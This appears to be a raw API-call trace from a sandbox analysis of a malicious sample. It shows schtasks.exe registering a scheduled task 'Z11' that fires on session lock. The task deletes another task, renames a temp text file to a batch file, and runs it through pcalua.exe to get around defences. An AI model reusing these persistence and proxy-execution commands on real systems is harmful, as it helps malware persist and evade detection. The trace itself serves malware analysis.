[0221.846] ReadFile (in: hFile=0xf4, lpBuffer=0x18c430, nNumberOfBytesToRead=0x2, lpNumberOfBytesRead=0x18c438, lpOverlapped=0x0 | out: lpBuffer=0x18c430*, lpNumberOfBytesRead=0x18c438*=0x2, lpOverlapped=0x0) returned 1
[0221.848] SetFilePointer (in: hFile=0xf4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
[0221.848] malloc (_Size=0x6fd) returned 0xd5fd0
[0221.848] ReadFile (in: hFile=0xf4, lpBuffer=0xd5fd0, nNumberOfBytesToRead=0x6fd, lpNumberOfBytesRead=0x18c438, lpOverlapped=0x0 | out: lpBuffer=0xd5fd0*, lpNumberOfBytesRead=0x18c438*=0x6fc, lpOverlapped=0x0) returned 1
[0221.849] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="\r\n\r\n \r\n 2024-01-02T21:08:22\r\n \\Z11\r\n \r\n \r\n \r\n true\r\n SessionLock\r\n kEecfMwgj\r\n \r\n \r\n \r\n \r\nInteractiveToken \r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n true\r\n true\r\n false\r\n false\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n true\r\n false\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n schtasks.exe\r\n /delete /tn \"\\lockw\" /f\r\n \r\n \r\n cmd.exe\r\n /c \"copy /y \"%temp%\\check01.txt\" \"%temp%\\check01.bat\" & timeout 1\"\r\n \r\n \r\n pcalua.exe\r\n -a \"%temp%\\check01.bat\"\r\n \r\n \r\n\r\n", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1789
[0221.849] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="\r\n\r\n \r\n 2024-01-02T21:08:22\r\n \\Z11\r\n \r\n \r\n \r\n true\r\n SessionLock\r\n kEecfMwgj\r\n \r\n \r\n \r\n \r\nInteractiveToken \r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n true\r\n true\r\n false\r\n false\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n true\r\n false\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n schtasks.exe\r\n /delete /tn \"\\lockw\" /f\r\n \r\n \r\n cmd.exe\r\n /c \"copy /y \"%temp%\\check01.txt\" \"%temp%\\check01.bat\" & timeout 1\"\r\n \r\n \r\n pcalua.exe\r\n -a \"%temp%\\check01.bat\"\r\n \r\n \r\n\r\n", cbMultiByte=-1, lpWideCharStr=0x306038, cchWideChar=1789 | out: lpWideCharStr="\r\n\r\n \r\n 2024-01-02T21:08:22\r\n \\Z11\r\n \r\n \r\n \r\n true\r\n SessionLock\r\n kEecfMwgj\r\n \r\n \r\n \r\n \r\nInteractiveToken \r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n true\r\n true\r\n false\r\n false\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n true\r\n false\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n schtasks.exe\r\n /delete /tn \"\\lockw\" /f\r\n \r\n \r\n cmd.exe\r\n /c \"copy /y \"%temp%\\check01.txt\" \"%temp%\\check01.bat\" & timeout 1\"\r\n \r\n \r\n pcalua.exe\r\n -a \"%temp%\\check01.bat\"\r\n \r\n \r\n\r\n") returned 1789
[0221.849] SysStringLen (param_1="\r\n\r\n \r\n 2024-01-02T21:08:22\r\n \\Z11\r\n \r\n \r\n \r\n true\r\n SessionLock\r\n kEecfMwgj\r\n \r\n \r\n \r\n \r\nInteractiveToken \r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n true\r\n true\r\n false\r\n false\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n true\r\n false\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n schtasks.exe\r\n /delete /tn \"\\lockw\" /f\r\n \r\n \r\n cmd.exe\r\n /c \"copy /y \"%temp%\\check01.txt\" \"%temp%\\check01.bat\" & timeout 1\"\r\n \r\n \r\n pcalua.exe\r\n -a \"%temp%\\check01.bat\"\r\n \r\n \r\n\r\n") returned 0x6fc
[0221.849] VarBstrCat (in: bstrLeft=0x0, bstrRight="\r\n\r\n \r\n 2024-01-02T21:08:22\r\n \\Z11\r\n \r\n \r\n \r\n true\r\n SessionLock\r\n kEecfMwgj\r\n \r\n \r\n \r\n \r\nInteractiveToken \r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n true\r\n true\r\n false\r\n false\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n true\r\n false\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n schtasks.exe\r\n /delete /tn \"\\lockw\" /f\r\n \r\n \r\n cmd.exe\r\n /c \"copy /y \"%temp%\\check01.txt\" \"%temp%\\check01.bat\" & timeout 1\"\r\n \r\n \r\n pcalua.exe\r\n -a \"%temp%\\check01.bat\"\r\n \r\n \r\n\r\n", pbstrResult=0x18c3c8 | out: pbstrResult=0x18c3c8) returned 0x0
[0221.947] free (_Block=0xd5fd0)
[0221.947] CloseHandle (hObject=0xf4) returned 1
[0221.949] lstrlenW (lpString="") returned 0
[0221.949] malloc (_Size=0x18) returned 0x19dfa0
[0221.949] SysStringLen (param_1="") returned 0x0
[0221.949] free (_Block=0x19dfa0)
[0221.949] lstrlenW (lpString="") returned 0
[0221.950] ITaskFolder:RegisterTask (in: This=0xd5b20, Path="\\Z11", XmlText="\r\n\r\n \r\n 2024-01-02T21:08:22\r\n \\Z11\r\n \r\n \r\n \r\n true\r\n SessionLock\r\n kEecfMwgj\r\n \r\n \r\n \r\n \r\nInteractiveToken \r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n true\r\n true\r\n false\r\n false\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n true\r\n false\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n schtasks.exe\r\n /delete /tn \"\\lockw\" /f\r\n \r\n \r\n cmd.exe\r\n /c \"copy /y \"%temp%\\check01.txt\" \"%temp%\\check01.bat\" & timeout 1\"\r\n \r\n \r\n pcalua.exe\r\n -a \"%temp%\\check01.bat\"\r\n \r\n \r\n\r\n", flags=6, UserId=0x18c510*(varType=0x8, wReserved1=0xd, wReserved2=0x0, wReserved3=0x0, varVal1="", varVal2=0x1c), password=0x18c530*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xd0230, varVal2=0xd0230), LogonType=0, sddl=0x18c4f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x10, varVal2=0x2fa490), ppTask=0x18c478 | out: ppTask=0x18c478*=0xd7d80) returned 0x0
[0222.815] GetProcessHeap () returned 0x2d0000
[0222.815] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x303b50
[0222.815] _memicmp (_Buf1=0x2ebc20, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0222.815] LoadStringW (in: hInstance=0x0, uID=0x12e, lpBuffer=0x2ed430, cchBufferMax=256 | out: lpBuffer="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 0x40
[0222.819] lstrlenW (lpString="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 64
[0222.819] GetProcessHeap () returned 0x2d0000
[0222.819] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x82) returned 0x307c70
[0222.820] _vsnwprintf (in: _Buffer=0x18c750, _BufferCount=0x1fb, _Format="SUCCESS: The scheduled task \"%s\" has successfully been created.\n", _ArgList=0x18c438 | out: _Buffer="SUCCESS: The scheduled task \"\\Z11\" has successfully been created.\n") returned 66
[0222.820] _fileno (_File=0x7feff862ab0) returned 1
[0222.820] _errno () returned 0xd4bb0
[0222.820] _get_osfhandle (_FileHandle=1) returned 0x7
[0222.820] _errno () returned 0xd4bb0
[0222.820] GetFileType (hFile=0x7) returned 0x2
[0222.823] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0222.823] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18c3b0 | out: lpMode=0x18c3b0) returned 1
[0222.824] __iob_func () returned 0x7feff862a80
[0222.824] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0222.824] lstrlenW (lpString="SUCCESS: The scheduled task \"\\Z11\" has successfully been created.\n") returned 66
[0222.824] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x18c750*, nNumberOfCharsToWrite=0x42, lpNumberOfCharsWritten=0x18c420, lpReserved=0x0 | out: lpBuffer=0x18c750*, lpNumberOfCharsWritten=0x18c420*=0x42) returned 1
[0222.828] IUnknown:Release (This=0xd7d80) returned 0x0
[0222.829] TaskScheduler:IUnknown:Release (This=0xd5b20) returned 0x0
[0222.829] TaskScheduler:IUnknown:Release (This=0xd5a70) returned 0x1
[0222.829] lstrlenW (lpString="") returned 0
[0222.829] lstrlenW (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml") returned 44
[0222.829] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45
[0222.829] GetProcessHeap () returned 0x2d0000
[0222.829] GetProcessHeap () returned 0x2d0000
[0222.829] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec4f0) returned 1
[0222.830] GetProcessHeap () returned 0x2d0000
[0222.830] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ec4f0) returned 0x1fc
[0222.830] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec4f0 | out: hHeap=0x2d0000) returned 1
[0222.830] GetProcessHeap () returned 0x2d0000
[0222.830] GetProcessHeap () returned 0x2d0000
[0222.831] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec480) returned 1
[0222.831] GetProcessHeap () returned 0x2d0000
[0222.831] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ec480) returned 0x5a
[0222.831] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec480 | out: hHeap=0x2d0000) returned 1
[0222.831] GetProcessHeap () returned 0x2d0000
[0222.831] GetProcessHeap () returned 0x2d0000
[0222.831] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ed6b0) returned 1
[0222.831] GetProcessHeap () returned 0x2d0000
[0222.831] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ed6b0) returned 0x16
[0222.832] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ed6b0 | out: hHeap=0x2d0000) returned 1
[0222.832] GetProcessHeap () returned 0x2d0000
[0222.832] GetProcessHeap () returned 0x2d0000
[0222.832] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ed690) returned 1
[0222.832] GetProcessHeap () returned 0x2d0000
[0222.832] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ed690) returned 0x18
[0222.832] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ed690 | out: hHeap=0x2d0000) returned 1
[0222.832] GetProcessHeap () returned 0x2d0000
[0222.832] GetProcessHeap () returned 0x2d0000
[0222.832] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ece40) returned 1
[0222.834] GetProcessHeap () returned 0x2d0000
[0222.834] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ece40) returned 0x20
[0222.835] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ece40 | out: hHeap=0x2d0000) returned 1
[0222.835] GetProcessHeap () returned 0x2d0000
[0222.835] GetProcessHeap () returned 0x2d0000
[0222.835] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec180) returned 1
[0222.835] GetProcessHeap () returned 0x2d0000
[0222.835] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ec180) returned 0xa0
[0222.836] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec180 | out: hHeap=0x2d0000) returned 1
[0222.836] GetProcessHeap () returned 0x2d0000
[0222.836] GetProcessHeap () returned 0x2d0000
[0222.836] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebc00) returned 1
[0222.836] GetProcessHeap () returned 0x2d0000
[0222.836] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ebc00) returned 0x18
[0222.837] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebc00 | out: hHeap=0x2d0000) returned 1
[0222.837] GetProcessHeap () returned 0x2d0000
[0222.837] GetProcessHeap () returned 0x2d0000
[0222.837] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eccc0) returned 1
[0222.837] GetProcessHeap () returned 0x2d0000
[0222.837] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2eccc0) returned 0x20
[0222.838] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eccc0 | out: hHeap=0x2d0000) returned 1
[0222.838] GetProcessHeap () returned 0x2d0000
[0222.838] GetProcessHeap () returned 0x2d0000
[0222.838] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ede40) returned 1
[0222.838] GetProcessHeap () returned 0x2d0000
[0222.838] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ede40) returned 0x5e
[0222.839] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ede40 | out: hHeap=0x2d0000) returned 1
[0222.839] GetProcessHeap () returned 0x2d0000
[0222.839] GetProcessHeap () returned 0x2d0000
[0222.839] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ed670) returned 1
[0222.839] GetProcessHeap () returned 0x2d0000
[0222.839] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ed670) returned 0x18
[0222.839] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ed670 | out: hHeap=0x2d0000) returned 1
[0222.839] GetProcessHeap () returned 0x2d0000
[0222.839] GetProcessHeap () returned 0x2d0000
[0222.839] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ecc60) returned 1
[0222.839] GetProcessHeap () returned 0x2d0000
[0222.840] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ecc60) returned 0x20
[0222.840] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ecc60 | out: hHeap=0x2d0000) returned 1
[0222.840] GetProcessHeap () returned 0x2d0000
[0222.840] GetProcessHeap () returned 0x2d0000
[0222.841] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec460) returned 1
[0222.841] GetProcessHeap () returned 0x2d0000
[0222.841] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ec460) returned 0xc
[0222.841] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec460 | out: hHeap=0x2d0000) returned 1
[0222.841] GetProcessHeap () returned 0x2d0000
[0222.841] GetProcessHeap () returned 0x2d0000
[0222.841] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec440) returned 1
[0222.841] GetProcessHeap () returned 0x2d0000
[0222.841] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ec440) returned 0x18
[0222.841] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec440 | out: hHeap=0x2d0000) returned 1
[0222.841] GetProcessHeap () returned 0x2d0000
[0222.841] GetProcessHeap () returned 0x2d0000
[0222.841] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5ed0) returned 1
[0222.842] GetProcessHeap () returned 0x2d0000
[0222.842] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5ed0) returned 0x20
[0222.842] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5ed0 | out: hHeap=0x2d0000) returned 1
[0222.842] GetProcessHeap () returned 0x2d0000
[0222.842] GetProcessHeap () returned 0x2d0000
[0222.843] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebd80) returned 1
[0222.843] GetProcessHeap () returned 0x2d0000
[0222.843] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ebd80) returned 0x208
[0222.843] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebd80 | out: hHeap=0x2d0000) returned 1
[0222.843] GetProcessHeap () returned 0x2d0000
[0222.844] GetProcessHeap () returned 0x2d0000
[0222.844] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebbe0) returned 1
[0222.844] GetProcessHeap () returned 0x2d0000
[0222.844] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ebbe0) returned 0x18
[0222.844] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebbe0 | out: hHeap=0x2d0000) returned 1
[0222.844] GetProcessHeap () returned 0x2d0000
[0222.844] GetProcessHeap () returned 0x2d0000
[0222.844] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5de0) returned 1
[0222.844] GetProcessHeap () returned 0x2d0000
[0222.844] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5de0) returned 0x20
[0222.845] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5de0 | out: hHeap=0x2d0000) returned 1
[0222.845] GetProcessHeap () returned 0x2d0000
[0222.845] GetProcessHeap () returned 0x2d0000
[0222.845] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ed430) returned 1
[0222.845] GetProcessHeap () returned 0x2d0000
[0222.845] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ed430) returned 0x200
[0222.846] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ed430 | out: hHeap=0x2d0000) returned 1
[0222.846] GetProcessHeap () returned 0x2d0000
[0222.846] GetProcessHeap () returned 0x2d0000
[0222.846] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebc20) returned 1
[0222.846] GetProcessHeap () returned 0x2d0000
[0222.846] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ebc20) returned 0x18
[0222.847] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebc20 | out: hHeap=0x2d0000) returned 1
[0222.847] GetProcessHeap () returned 0x2d0000
[0222.847] GetProcessHeap () returned 0x2d0000
[0222.847] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5d50) returned 1
[0222.847] GetProcessHeap () returned 0x2d0000
[0222.847] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5d50) returned 0x20
[0222.848] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5d50 | out: hHeap=0x2d0000) returned 1
[0222.848] GetProcessHeap () returned 0x2d0000
[0222.848] GetProcessHeap () returned 0x2d0000
[0222.848] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec390) returned 1
[0222.922] GetProcessHeap () returned 0x2d0000
[0222.923] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ec390) returned 0x14
[0222.923] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec390 | out: hHeap=0x2d0000) returned 1
[0222.923] GetProcessHeap () returned 0x2d0000
[0222.923] GetProcessHeap () returned 0x2d0000
[0222.923] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec370) returned 1
[0222.923] GetProcessHeap () returned 0x2d0000
[0222.923] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ec370) returned 0x18
[0222.923] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec370 | out: hHeap=0x2d0000) returned 1
[0222.923] GetProcessHeap () returned 0x2d0000
[0222.923] GetProcessHeap () returned 0x2d0000
[0222.923] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5c90) returned 1
[0222.923] GetProcessHeap () returned 0x2d0000
[0222.924] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5c90) returned 0x20
[0222.924] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5c90 | out: hHeap=0x2d0000) returned 1
[0222.925] GetProcessHeap () returned 0x2d0000
[0222.925] GetProcessHeap () returned 0x2d0000
[0222.925] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec3b0) returned 1
[0222.925] GetProcessHeap () returned 0x2d0000
[0222.925] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ec3b0) returned 0x16
[0222.925] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec3b0 | out: hHeap=0x2d0000) returned 1
[0222.925] GetProcessHeap () returned 0x2d0000
[0222.925] GetProcessHeap () returned 0x2d0000
[0222.925] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec230) returned 1
[0222.925] GetProcessHeap () returned 0x2d0000
[0222.925] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ec230) returned 0x18
[0222.925] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec230 | out: hHeap=0x2d0000) returned 1
[0222.926] GetProcessHeap () returned 0x2d0000
[0222.926] GetProcessHeap () returned 0x2d0000
[0222.926] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5c60) returned 1
[0222.926] GetProcessHeap () returned 0x2d0000
[0222.926] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5c60) returned 0x20
[0222.927] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5c60 | out: hHeap=0x2d0000) returned 1
[0222.927] GetProcessHeap () returned 0x2d0000
[0222.927] GetProcessHeap () returned 0x2d0000
[0222.928] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebb60) returned 1
[0222.928] GetProcessHeap () returned 0x2d0000
[0222.928] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ebb60) returned 0x2
[0222.928] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebb60 | out: hHeap=0x2d0000) returned 1
[0222.928] GetProcessHeap () returned 0x2d0000
[0222.928] GetProcessHeap () returned 0x2d0000
[0222.928] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5ab0) returned 1
[0222.928] GetProcessHeap () returned 0x2d0000
[0222.928] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5ab0) returned 0x20
[0222.929] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5ab0 | out: hHeap=0x2d0000) returned 1
[0222.929] GetProcessHeap () returned 0x2d0000
[0222.929] GetProcessHeap () returned 0x2d0000
[0222.929] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5ae0) returned 1
[0222.929] GetProcessHeap () returned 0x2d0000
[0222.929] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5ae0) returned 0x20
[0222.930] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5ae0 | out: hHeap=0x2d0000) returned 1
[0222.930] GetProcessHeap () returned 0x2d0000
[0222.930] GetProcessHeap () returned 0x2d0000
[0222.930] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5b10) returned 1
[0222.930] GetProcessHeap () returned 0x2d0000
[0222.930] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5b10) returned 0x20
[0222.931] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5b10 | out: hHeap=0x2d0000) returned 1
[0222.931] GetProcessHeap () returned 0x2d0000
[0222.931] GetProcessHeap () returned 0x2d0000
[0222.931] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5b40) returned 1
[0222.931] GetProcessHeap () returned 0x2d0000
[0222.931] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5b40) returned 0x20
[0222.932] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5b40 | out: hHeap=0x2d0000) returned 1
[0222.932] GetProcessHeap () returned 0x2d0000
[0222.932] GetProcessHeap () returned 0x2d0000
[0222.932] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eccf0) returned 1
[0222.932] GetProcessHeap () returned 0x2d0000
[0222.932] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2eccf0) returned 0x20
[0222.933] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eccf0 | out: hHeap=0x2d0000) returned 1
[0222.933] GetProcessHeap () returned 0x2d0000
[0222.933] GetProcessHeap () returned 0x2d0000
[0222.933] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ecd20) returned 1
[0222.933] GetProcessHeap () returned 0x2d0000
[0222.933] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ecd20) returned 0x20
[0222.934] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ecd20 | out: hHeap=0x2d0000) returned 1
[0222.934] GetProcessHeap () returned 0x2d0000
[0222.934] GetProcessHeap () returned 0x2d0000
[0222.934] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e7d40) returned 1
[0222.934] GetProcessHeap () returned 0x2d0000
[0222.934] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e7d40) returned 0x30
[0222.935] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e7d40 | out: hHeap=0x2d0000) returned 1
[0222.935] GetProcessHeap () returned 0x2d0000
[0222.935] GetProcessHeap () returned 0x2d0000
[0222.935] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ecd50) returned 1
[0222.935] GetProcessHeap () returned 0x2d0000
[0222.935] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ecd50) returned 0x20
[0222.936] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ecd50 | out: hHeap=0x2d0000) returned 1
[0222.936] GetProcessHeap () returned 0x2d0000
[0222.936] GetProcessHeap () returned 0x2d0000
[0222.936] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e7d80) returned 1
[0222.936] GetProcessHeap () returned 0x2d0000
[0222.936] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e7d80) returned 0x30
[0222.937] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e7d80 | out: hHeap=0x2d0000) returned 1
[0222.937] GetProcessHeap () returned 0x2d0000
[0222.937] GetProcessHeap () returned 0x2d0000
[0222.937] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ece10) returned 1
[0222.937] GetProcessHeap () returned 0x2d0000
[0222.937] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ece10) returned 0x20
[0222.937] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ece10 | out: hHeap=0x2d0000) returned 1
[0222.938] GetProcessHeap () returned 0x2d0000
[0222.938] GetProcessHeap () returned 0x2d0000
[0222.938] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x307c70) returned 1
[0222.938] GetProcessHeap () returned 0x2d0000
[0222.938] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x307c70) returned 0x82
[0222.938] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x307c70 | out: hHeap=0x2d0000) returned 1
[0222.938] GetProcessHeap () returned 0x2d0000
[0222.938] GetProcessHeap () returned 0x2d0000
[0222.938] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x303b50) returned 1
[0222.939] GetProcessHeap () returned 0x2d0000
[0222.939] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x303b50) returned 0x20
[0222.939] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x303b50 | out: hHeap=0x2d0000) returned 1
[0222.939] GetProcessHeap () returned 0x2d0000
[0222.939] GetProcessHeap () returned 0x2d0000
[0222.939] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebb80) returned 1
[0222.939] GetProcessHeap () returned 0x2d0000
